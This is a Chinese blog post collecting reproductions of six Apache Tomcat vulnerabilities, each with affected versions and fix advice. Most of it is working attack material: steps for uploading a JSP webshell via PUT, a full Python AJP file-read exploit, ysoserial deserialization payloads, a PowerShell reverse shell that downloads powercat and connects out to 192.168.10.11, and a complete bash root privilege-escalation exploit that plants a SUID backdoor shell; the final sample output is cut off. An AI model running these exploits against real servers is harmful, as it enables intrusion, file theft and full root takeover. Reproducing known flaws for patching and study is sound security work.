devbox
爱喝兽奶帝天荒
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

tomcat 漏洞集合_apache tomcat 8 . 0 . 36漏洞

作者:爱喝兽奶帝天荒 | 2024-08-20 07:05:48

apache tomcat 8 . 0 . 36漏洞

目录

PUT 任意文件上传(CVE-2017-12615)

影响版本

漏洞复现

修复建议

远程代码执行(CVE-2019-0232)

影响版本

漏洞复现

​编辑修复建议

Apache-Tomcat-Ajp漏洞(CVE-2020-1938)

影响版本

漏洞复现

修复建议

Tomcat Session(CVE-2020-9484)反序列化漏洞

影响版本

漏洞复现

修复建议

Tomcat反序列化漏洞(CVE-2016-8735)

影响版本

漏洞复现

修复建议

Tomcat本地提权漏洞(CVE-2016-1240)

影响版本

漏洞复现

修复建议

PUT 任意文件上传(CVE-2017-12615)

影响版本

tomcat 7.0.0~7.0.79

漏洞复现

1. 访问apache tomcat首页 http://192.168.17.140:8080

2. 访问http://192.168.17.140:8080/,使用burpsuit工具进行抓包,并将请求包发送至Repeater 

3. 将请求包GET方式改为PUT方式,上传ceshi.jsp,内容为“Hello Word”,点击发送,发现服务器返回“201”

4. 访问刚上传的ceshi.jsp文件,发现可访问,从而确定存在CVE-2017-12615漏洞

5. 接下来上传木马backdoor.jsp,如图所示上传成功

6. 使用冰蝎连接shell,密码为“rebeyond”

修复建议

用户可以禁用PUT方法来防护此漏洞,操作方式如下:
在Tomcat的web.xml 文件中配置org.apache.catalina.servlets.DefaultServlet的初始化参数

  1. <init-param>
  2. <param-name>readonly</param-name>
  3. <param-value>true</param-value>
  4. </init-param>

 确保readonly参数为true(默认值),即不允许DELETE和PUT操作。

远程代码执行(CVE-2019-0232)

影响版本

tomcat 7.0.94之前

tomcat 8.5.40之前

tomcat 9.0.19之前   版本都会影响

漏洞复现

 1. 首先修改apache-tomcat-9.0.13\conf\ web.xml

将此段注释删除,并添加红框内代码。

  1.         <init-param>
  2.           <param-name>enableCmdLineArguments</param-name>
  3.           <param-value>true</param-value>
  4.         </init-param>
  5.         <init-param>
  6.           <param-name>executadle</param-name>
  7.           <param-value></param-value>
  8.         </init-param>

2. 将此处注释删除

3. 更改

apache-tomcat-9.0.13\conf\ context.xml

4. 在apache-tomcat-9.0.13\webapps\ROOT\WEB-INF目录下,新建 cgi-bin 文件夹
在文件夹内创建一个.bat文件 

 

  1. @echo off
  2. echo Content-Type: test/plain
  3. echo.
  4. set foo=&~1
  5. %foo%

 

5. 在后边追加命令,即可实现命令执行操作

修复建议

1. 禁用enableCmdLineArguments参数。

2. 在conf/web.xml中覆写采用更严格的参数合法性检验规则。

3. 升级tomcat到9.0.17以上版本。

Apache-Tomcat-Ajp漏洞(CVE-2020-1938)

影响版本

Apache Tomcat 6

Apache Tomcat 7 < 7.0.100

Apache Tomcat 8 < 8.5.51

Apache Tomcat 9 < 9.0.31

开启了8009端口的ajp服务

漏洞复现

1. 网址中下载Tomcat,下载好安装包之后,进入bin目录执行startup.bat启动tomcat

 2. 访问http://localhost:8080

3. 修改配置文件,首先修改apache-tomcat-9.0.13\conf\ web.xml 

将此段注释删除,并添加红框内代码

  1.       <init-param>
  2.         <param-name>enableCmdLineArguments</param-name>
  3.         <param-value>true</param-value>
  4.       </init-param>
  5.       <init-param>
  6.         <param-name>executadle</param-name>
  7.         <param-value></param-value>
  8.       </init-param>

4. 将此处注释删除

 5. 修改 apache-tomcat-9.0.13\conf\ context.xml

添加privileged="true"语句 如下图

 环境搭建完成!

6. 在cmd下执行python脚本

脚本代码如下:

  1. #!/usr/bin/env python
  2. #CNVD-2020-10487  Tomcat-Ajp lfi
  3. #by ydhcui
  4. import struct
  5.  
  6. # Some references:
  7. # https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
  8. def pack_string(s):
  9. 	if s is None:
  10. 		return struct.pack(">h", -1)
  11. 	l = len(s)
  12. 	return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0)
  13. def unpack(stream, fmt):
  14. 	size = struct.calcsize(fmt)
  15. 	buf = stream.read(size)
  16. 	return struct.unpack(fmt, buf)
  17. def unpack_string(stream):
  18. 	size, = unpack(stream, ">h")
  19. 	if size == -1: # null string
  20. 		return None
  21. 	res, = unpack(stream, "%ds" % size)
  22. 	stream.read(1) # \0
  23. 	return res
  24. class NotFoundException(Exception):
  25. 	pass
  26. class AjpBodyRequest(object):
  27. 	# server == web server, container == servlet
  28. 	SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
  29. 	MAX_REQUEST_LENGTH = 8186
  30. 	def __init__(self, data_stream, data_len, data_direction=None):
  31. 		self.data_stream = data_stream
  32. 		self.data_len = data_len
  33. 		self.data_direction = data_direction
  34. 	def serialize(self):
  35. 		data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH)
  36. 		if len(data) == 0:
  37. 			return struct.pack(">bbH", 0x12, 0x34, 0x00)
  38. 		else:
  39. 			res = struct.pack(">H", len(data))
  40. 			res += data
  41. 		if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER:
  42. 			header = struct.pack(">bbH", 0x12, 0x34, len(res))
  43. 		else:
  44. 			header = struct.pack(">bbH", 0x41, 0x42, len(res))
  45. 		return header + res
  46. 	def send_and_receive(self, socket, stream):
  47. 		while True:
  48. 			data = self.serialize()
  49. 			socket.send(data)
  50. 			r = AjpResponse.receive(stream)
  51. 			while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS:
  52. 				r = AjpResponse.receive(stream)
  53.  
  54. 			if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4:
  55. 				break
  56. class AjpForwardRequest(object):
  57. 	_, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(28)
  58. 	REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 'TRACE': TRACE}
  59. 	# server == web server, container == servlet
  60. 	SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
  61. 	COMMON_HEADERS = ["SC_REQ_ACCEPT",
  62. 		"SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE", "SC_REQ_AUTHORIZATION",
  63. 		"SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE", "SC_REQ_COOKIE2",
  64. 		"SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT"
  65. 	]
  66. 	ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert", "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"]
  67. 	def __init__(self, data_direction=None):
  68. 		self.prefix_code = 0x02
  69. 		self.method = None
  70. 		self.protocol = None
  71. 		self.req_uri = None
  72. 		self.remote_addr = None
  73. 		self.remote_host = None
  74. 		self.server_name = None
  75. 		self.server_port = None
  76. 		self.is_ssl = None
  77. 		self.num_headers = None
  78. 		self.request_headers = None
  79. 		self.attributes = None
  80. 		self.data_direction = data_direction
  81. 	def pack_headers(self):
  82. 		self.num_headers = len(self.request_headers)
  83. 		res = ""
  84. 		res = struct.pack(">h", self.num_headers)
  85. 		for h_name in self.request_headers:
  86. 			if h_name.startswith("SC_REQ"):
  87. 				code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1
  88. 				res += struct.pack("BB", 0xA0, code)
  89. 			else:
  90. 				res += pack_string(h_name)
  91.  
  92. 			res += pack_string(self.request_headers[h_name])
  93. 		return res
  94.  
  95. 	def pack_attributes(self):
  96. 		res = b""
  97. 		for attr in self.attributes:
  98. 			a_name = attr['name']
  99. 			code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1
  100. 			res += struct.pack("b", code)
  101. 			if a_name == "req_attribute":
  102. 				aa_name, a_value = attr['value']
  103. 				res += pack_string(aa_name)
  104. 				res += pack_string(a_value)
  105. 			else:
  106. 				res += pack_string(attr['value'])
  107. 		res += struct.pack("B", 0xFF)
  108. 		return res
  109. 	def serialize(self):
  110. 		res = ""
  111. 		res = struct.pack("bb", self.prefix_code, self.method)
  112. 		res += pack_string(self.protocol)
  113. 		res += pack_string(self.req_uri)
  114. 		res += pack_string(self.remote_addr)
  115. 		res += pack_string(self.remote_host)
  116. 		res += pack_string(self.server_name)
  117. 		res += struct.pack(">h", self.server_port)
  118. 		res += struct.pack("?", self.is_ssl)
  119. 		res += self.pack_headers()
  120. 		res += self.pack_attributes()
  121. 		if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:
  122. 			header = struct.pack(">bbh", 0x12, 0x34, len(res))
  123. 		else:
  124. 			header = struct.pack(">bbh", 0x41, 0x42, len(res))
  125. 		return header + res
  126. 	def parse(self, raw_packet):
  127. 		stream = StringIO(raw_packet)
  128. 		self.magic1, self.magic2, data_len = unpack(stream, "bbH")
  129. 		self.prefix_code, self.method = unpack(stream, "bb")
  130. 		self.protocol = unpack_string(stream)
  131. 		self.req_uri = unpack_string(stream)
  132. 		self.remote_addr = unpack_string(stream)
  133. 		self.remote_host = unpack_string(stream)
  134. 		self.server_name = unpack_string(stream)
  135. 		self.server_port = unpack(stream, ">h")
  136. 		self.is_ssl = unpack(stream, "?")
  137. 		self.num_headers, = unpack(stream, ">H")
  138. 		self.request_headers = {}
  139. 		for i in range(self.num_headers):
  140. 			code, = unpack(stream, ">H")
  141. 			if code > 0xA000:
  142. 				h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001]
  143. 			else:
  144. 				h_name = unpack(stream, "%ds" % code)
  145. 				stream.read(1) # \0
  146. 			h_value = unpack_string(stream)
  147. 			self.request_headers[h_name] = h_value
  148. 	def send_and_receive(self, socket, stream, save_cookies=False):
  149. 		res = []
  150. 		i = socket.sendall(self.serialize())
  151. 		if self.method == AjpForwardRequest.POST:
  152. 			return res
  153.  
  154. 		r = AjpResponse.receive(stream)
  155. 		assert r.prefix_code == AjpResponse.SEND_HEADERS
  156. 		res.append(r)
  157. 		if save_cookies and 'Set-Cookie' in r.response_headers:
  158. 			self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie']
  159.  
  160. 		# read body chunks and end response packets
  161. 		while True:
  162. 			r = AjpResponse.receive(stream)
  163. 			res.append(r)
  164. 			if r.prefix_code == AjpResponse.END_RESPONSE:
  165. 				break
  166. 			elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK:
  167. 				continue
  168. 			else:
  169. 				raise NotImplementedError
  170. 				break
  171.  
  172. 		return res
  173.  
  174. class AjpResponse(object):
  175. 	_,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7)
  176. 	COMMON_SEND_HEADERS = [
  177. 			"Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified",
  178. 			"Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate"
  179. 			]
  180. 	def parse(self, stream):
  181. 		# read headers
  182. 		self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")
  183.  
  184. 		if self.prefix_code == AjpResponse.SEND_HEADERS:
  185. 			self.parse_send_headers(stream)
  186. 		elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK:
  187. 			self.parse_send_body_chunk(stream)
  188. 		elif self.prefix_code == AjpResponse.END_RESPONSE:
  189. 			self.parse_end_response(stream)
  190. 		elif self.prefix_code == AjpResponse.GET_BODY_CHUNK:
  191. 			self.parse_get_body_chunk(stream)
  192. 		else:
  193. 			raise NotImplementedError
  194.  
  195. 	def parse_send_headers(self, stream):
  196. 		self.http_status_code, = unpack(stream, ">H")
  197. 		self.http_status_msg = unpack_string(stream)
  198. 		self.num_headers, = unpack(stream, ">H")
  199. 		self.response_headers = {}
  200. 		for i in range(self.num_headers):
  201. 			code, = unpack(stream, ">H")
  202. 			if code <= 0xA000: # custom header
  203. 				h_name, = unpack(stream, "%ds" % code)
  204. 				stream.read(1) # \0
  205. 				h_value = unpack_string(stream)
  206. 			else:
  207. 				h_name = AjpResponse.COMMON_SEND_HEADERS[code-0xA001]
  208. 				h_value = unpack_string(stream)
  209. 			self.response_headers[h_name] = h_value
  210.  
  211. 	def parse_send_body_chunk(self, stream):
  212. 		self.data_length, = unpack(stream, ">H")
  213. 		self.data = stream.read(self.data_length+1)
  214.  
  215. 	def parse_end_response(self, stream):
  216. 		self.reuse, = unpack(stream, "b")
  217.  
  218. 	def parse_get_body_chunk(self, stream):
  219. 		rlen, = unpack(stream, ">H")
  220. 		return rlen
  221.  
  222. 	@staticmethod
  223. 	def receive(stream):
  224. 		r = AjpResponse()
  225. 		r.parse(stream)
  226. 		return r
  227.  
  228. import socket
  229.  
  230. def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
  231. 	fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
  232. 	fr.method = method
  233. 	fr.protocol = "HTTP/1.1"
  234. 	fr.req_uri = req_uri
  235. 	fr.remote_addr = target_host
  236. 	fr.remote_host = None
  237. 	fr.server_name = target_host
  238. 	fr.server_port = 80
  239. 	fr.request_headers = {
  240. 		'SC_REQ_ACCEPT': 'text/html',
  241. 		'SC_REQ_CONNECTION': 'keep-alive',
  242. 		'SC_REQ_CONTENT_LENGTH': '0',
  243. 		'SC_REQ_HOST': target_host,
  244. 		'SC_REQ_USER_AGENT': 'Mozilla',
  245. 		'Accept-Encoding': 'gzip, deflate, sdch',
  246. 		'Accept-Language': 'en-US,en;q=0.5',
  247. 		'Upgrade-Insecure-Requests': '1',
  248. 		'Cache-Control': 'max-age=0'
  249. 	}
  250. 	fr.is_ssl = False
  251. 	fr.attributes = []
  252. 	return fr
  253.  
  254. class Tomcat(object):
  255. 	def __init__(self, target_host, target_port):
  256. 		self.target_host = target_host
  257. 		self.target_port = target_port
  258.  
  259. 		self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  260. 		self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  261. 		self.socket.connect((target_host, target_port))
  262. 		self.stream = self.socket.makefile("rb", bufsize=0)
  263.  
  264. 	def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
  265. 		self.req_uri = req_uri
  266. 		self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method))
  267. 		print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
  268. 		if user is not None and password is not None:
  269. 			self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode('base64').replace('\n', '')
  270. 		for h in headers:
  271. 			self.forward_request.request_headers[h] = headers[h]
  272. 		for a in attributes:
  273. 			self.forward_request.attributes.append(a)
  274. 		responses = self.forward_request.send_and_receive(self.socket, self.stream)
  275. 		if len(responses) == 0:
  276. 			return None, None
  277. 		snd_hdrs_res = responses[0]
  278. 		data_res = responses[1:-1]
  279. 		if len(data_res) == 0:
  280. 			print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers)
  281. 		return snd_hdrs_res, data_res
  282.  
  283. '''
  284. javax.servlet.include.request_uri
  285. javax.servlet.include.path_info
  286. javax.servlet.include.servlet_path
  287. '''
  288.  
  289. import argparse
  290. parser = argparse.ArgumentParser()
  291. parser.add_argument("target", type=str, help="Hostname or IP to attack")
  292. parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
  293. parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
  294. args = parser.parse_args()
  295. t = Tomcat(args.target, args.port)
  296. _,data = t.perform_request('/asdf',attributes=[
  297.     {'name':'req_attribute','value':['javax.servlet.include.request_uri','/']},
  298.     {'name':'req_attribute','value':['javax.servlet.include.path_info',args.file]},
  299.     {'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']},
  300.     ])
  301. print('----------------------------')
  302. print("".join([d.data for d in data]))

 7. 可以成功访问文件,漏洞复现成功!

修复建议

1、禁用AIP协议端口,在conf/server.xml配置文件中注释掉<Connector port=“8009” protocol="AJP/1.3"redirectPort=“8443”/>

2、升级官方最新版本。

Tomcat Session(CVE-2020-9484)反序列化漏洞

影响版本

Apache Tomcat 10.0.0-M1—10.0.0-M4

Apache Tomcat 9.0.0.M1—9.0.34

Apache Tomcat 8.5.0—8.5.54

Apache Tomcat 7.0.0—7.0.103

  • 攻击者能够控制服务器上文件的内容和文件名称
  • 服务器PersistenceManager配置中使用了FileStore
  • PersistenceManager中的sessionAttributeValueClassNameFilter被配置为“null”,或者过滤器不够严格,导致允许攻击者提供反序列化数据的对象
  • 攻击者知道使用的FileStore存储位置到攻击者可控文件的相对路径

漏洞复现

下载ysoserial 一个生成java反序列化 payload 的 .jar 包

下载地址: https://github.com/frohoff/ysoserial.git

用浏览器下载,解压,并生成一个jar包,复制进linux系统

生成jar包的方式,进入文件夹的目录输入 输入命令: mvn package

编译有点慢需要几分钟世间

编译完成后在target目录下,有jar包

执行下面语句生成 payload

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Groovy1 "touch /tmp/2333" > /tmp/test.session  使用以下命令访问tomcat服务

curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../tmp/test'

 虽然显示报错,但是也执行了。在/tmp目录下创建了2333目录

修复建议

  • 升级到 Apache Tomcat 10.0.0-M5 及以上版本
  • 升级到 Apache Tomcat 9.0.35 及以上版本
  • 升级到 Apache Tomcat 8.5.55 及以上版本
  • 升级到 Apache Tomcat 7.0.104 及以上版本

临时修复建议

禁止使用Session持久化功能FileStore

Tomcat反序列化漏洞(CVE-2016-8735)

影响版本

Apache Tomcat 9.0.0.M1 to 9.0.0.M11
Apache Tomcat 8.5.0 to 8.5.6
Apache Tomcat 8.0.0.RC1 to 8.0.38
Apache Tomcat 7.0.0 to 7.0.72
Apache Tomcat 6.0.0 to 6.0.47

  • 外部需要开启JmxRemoteLifecycleListener监听的 10001 和 10002 端口,来实现远程代码执行

漏洞复现

环境:Tomcat7.0.39

在 conf/server.xml 中第 30 行中配置启用JmxRemoteLifecycleListener功能监听的端口

        配置好 jmx 的端口后,我们在 tomcat 版本(Index of /dist/tomcat)所对应的 extras/ 目录下来下载 catalina-jmx-remote.jar 以及下载 groovy-2.3.9.jar 两个jar 包。下载完成后放至在lib目录下。

        接着我们再去bin目录下修改catalina.bat脚本。在ExecuteThe Requested Command注释前面添加这么一行。主要配置的意思是设置启动tomcat的相关配置,不开启远程监听jvm信息。设置不启用他的ssl链接和不使用监控的账户。具体的配置可以去了解一下利用tomcat的jmx监控。

 

然后启动 Tomcat ,看看本地的 10001 和 10002 端口是否开放 

漏洞利用代码

java -cp  ysoserial.jar ysoserial.exploit.RMIRegistryExploit  127.0.0.1 10001 Groovy1  "calc.exe"

 

但是由于该命令没有回显,所以我们还是选择反弹shell回来,以下是反弹nc的shell。更多的关于windows反弹shell的cmd和powershell命令,传送门:Windows反弹Shell  

java -cp  ysoserial.jar ysoserial.exploit.RMIRegistryExploit  127.0.0.1 10001 Groovy1  "powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11 -p 8888 -e cmd"

修复建议

1、关闭 JmxRemoteLifecycleListener 功能,或者是对 jmx JmxRemoteLifecycleListener 远程端口进行网络访问控制。同时,增加严格的认证方式。

2、根据官方去升级更新相对应的版本。

Tomcat本地提权漏洞(CVE-2016-1240)

影响版本

Tomcat 8 <= 8.0.36-2
Tomcat 7 <= 7.0.70-2
Tomcat 6 <= 6.0.45+dfsg-1~deb8u1

  • 通过deb包安装的tomcat
  • 需要重启tomcat
  • 受影响的系统包括DebianUbuntu,其他使用相应deb包的系统也可能受到影响

漏洞复现

        Debian系统的Linux上管理员通常利用apt-get进行包管理,CVE-2016-1240这一漏洞其问题出在Tomcat的deb包中,使 deb包安装的Tomcat程序会自动为管理员安装一个启动脚本:/etc/init.d/tocat* 利用该脚本,可导致攻击者通过低权限的Tomcat用户获得系统root权限!

        本地攻击者,作为tomcat用户(比如说,通过web应用的漏洞)若将catalina.out修改为指向任意系统文件的链接,一旦Tomcat init脚本(ROOT权限运行)在服务重启后再次打开catalina.out文件,攻击者就可获取ROOT权限。

 漏洞poc

  1. #!/bin/bash
  2. #
  3. # Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
  4. #
  5. # CVE-2016-1240
  6. #
  7. # Discovered and coded by:
  8. #
  9. # Dawid Golunski
  10. # http://legalhackers.com
  11. #
  12. # This exploit targets Tomcat (versions 6, 7 and 8) packaging on 
  13. # Debian-based distros including Debian, Ubuntu etc.
  14. # It allows attackers with a tomcat shell (e.g. obtained remotely through a 
  15. # vulnerable java webapp, or locally via weak permissions on webapps in the 
  16. # Tomcat webroot directories etc.) to escalate their privileges to root.
  17. #
  18. # Usage:
  19. # ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]
  20. #
  21. # The exploit can used in two ways:
  22. #
  23. # -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly
  24. # gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. 
  25. # It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up
  26. # a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)
  27. #
  28. # -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to 
  29. # /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. 
  30. # Attackers can come back at a later time and check on the /etc/default/locale file. Upon a 
  31. # Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can
  32. # then add arbitrary commands to the file which will be executed with root privileges by 
  33. # the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default 
  34. # Ubuntu/Debian Tomcat installations).
  35. #
  36. # See full advisory for details at:
  37. # http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
  38. #
  39. # Disclaimer:
  40. # For testing purposes only. Do no harm.
  41. #
  42.  
  43. BACKDOORSH="/bin/bash"
  44. BACKDOORPATH="/tmp/tomcatrootsh"
  45. PRIVESCLIB="/tmp/privesclib.so"
  46. PRIVESCSRC="/tmp/privesclib.c"
  47. SUIDBIN="/usr/bin/sudo"
  48.  
  49. function cleanexit {
  50.     # Cleanup 
  51.     echo -e "\n[+] Cleaning up..."
  52.     rm -f $PRIVESCSRC
  53.     rm -f $PRIVESCLIB
  54.     rm -f $TOMCATLOG
  55.     touch $TOMCATLOG
  56.     if [ -f /etc/ld.so.preload ]; then
  57.         echo -n > /etc/ld.so.preload 2>/dev/null
  58.     fi
  59.     echo -e "\n[+] Job done. Exiting with code $1 \n"
  60.     exit $1
  61. }
  62.  
  63. function ctrl_c() {
  64.         echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
  65.     cleanexit 0
  66. }
  67.  
  68. #intro 
  69. echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n"
  70. echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"
  71.  
  72. # Args
  73. if [ $# -lt 1 ]; then
  74.     echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n"
  75.     exit 3
  76. fi
  77. if [ "$2" = "-deferred" ]; then
  78.     mode="deferred"
  79. else
  80.     mode="active"
  81. fi
  82.  
  83. # Priv check
  84. echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`"
  85. id | grep -q tomcat
  86. if [ $? -ne 0 ]; then
  87.     echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n"
  88.     exit 3
  89. fi
  90.  
  91. # Set target paths
  92. TOMCATLOG="$1"
  93. if [ ! -f $TOMCATLOG ]; then
  94.     echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n"
  95.     exit 3
  96. fi
  97. echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG"
  98.  
  99. # [ Deferred exploitation ]
  100.  
  101. # Symlink the log file to /etc/default/locale file which gets executed daily on default
  102. # tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.
  103. # Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been
  104. # restarted and file owner gets changed.
  105. if [ "$mode" = "deferred" ]; then
  106.     rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG
  107.     if [ $? -ne 0 ]; then
  108.         echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
  109.         cleanexit 3
  110.     fi
  111.     echo -e  "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"
  112.     echo -e  "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`"
  113.     echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot"
  114.     echo -ne "\n    you'll be able to add arbitrary commands to the file which will get executed with root privileges"
  115.     echo -ne "\n    at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)
  116.  \n\n"
  117.     exit 0
  118. fi
  119.  
  120. # [ Active exploitation ]
  121.  
  122. trap ctrl_c INT
  123. # Compile privesc preload library
  124. echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
  125. cat <<_solibeof_>$PRIVESCSRC
  126. #define _GNU_SOURCE
  127. #include 
  128. #include 
  129. #include 
  130. #include 
  131. uid_t geteuid(void) {
  132.     static uid_t  (*old_geteuid)();
  133.     old_geteuid = dlsym(RTLD_NEXT, "geteuid");
  134.     if ( old_geteuid() == 0 ) {
  135.         chown("$BACKDOORPATH", 0, 0);
  136.         chmod("$BACKDOORPATH", 04777);
  137.         unlink("/etc/ld.so.preload");
  138.     }
  139.     return old_geteuid();
  140. }
  141. _solibeof_
  142. gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl
  143. if [ $? -ne 0 ]; then
  144.     echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
  145.     cleanexit 2;
  146. fi
  147.  
  148. # Prepare backdoor shell
  149. cp $BACKDOORSH $BACKDOORPATH
  150. echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"
  151.  
  152. # Safety check
  153. if [ -f /etc/ld.so.preload ]; then
  154.     echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
  155.     cleanexit 2
  156. fi
  157.  
  158. # Symlink the log file to ld.so.preload
  159. rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG
  160. if [ $? -ne 0 ]; then
  161.     echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
  162.     cleanexit 3
  163. fi
  164. echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"
  165.  
  166. # Wait for Tomcat to re-open the logs
  167. echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..."
  168. echo -e  "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)
  169.  "
  170. while :; do 
  171.     sleep 0.1
  172.     if [ -f /etc/ld.so.preload ]; then
  173.         echo $PRIVESCLIB > /etc/ld.so.preload
  174.         break;
  175.     fi
  176. done
  177.  
  178. # /etc/ld.so.preload file should be owned by tomcat user at this point
  179. # Inject the privesc.so shared library to escalate privileges
  180. echo $PRIVESCLIB > /etc/ld.so.preload
  181. echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`"
  182. echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
  183. echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
  184.  
  185. # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
  186. echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
  187. sudo --help 2>/dev/null >/dev/null
  188.  
  189. # Check for the rootshell
  190. ls -l $BACKDOORPATH | grep rws | grep -q root
  191. if [ $? -eq 0 ]; then 
  192.     echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
  193.     echo -e "\n\033[94mPlease tell me you're seeing this too ;)
  194.   \033[0m"
  195. else
  196.     echo -e "\n[!] Failed to get root"
  197.     cleanexit 2
  198. fi
  199.  
  200. # Execute the rootshell
  201. echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n"
  202. $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
  203. $BACKDOORPATH -p
  204.  
  205. # Job done.
  206. cleanexit 0

poc运行

  1. tomcat7@ubuntu:/tmp$ id
  2. uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)
  3.  
  4. tomcat7@ubuntu:/tmp$ lsb_release -a
  5. No LSB modules are available.
  6. Distributor ID: Ubuntu
  7. Description:    Ubuntu 16.04 LTS
  8. Release:    16.04
  9. Codename:   xenial
  10.  
  11. tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat
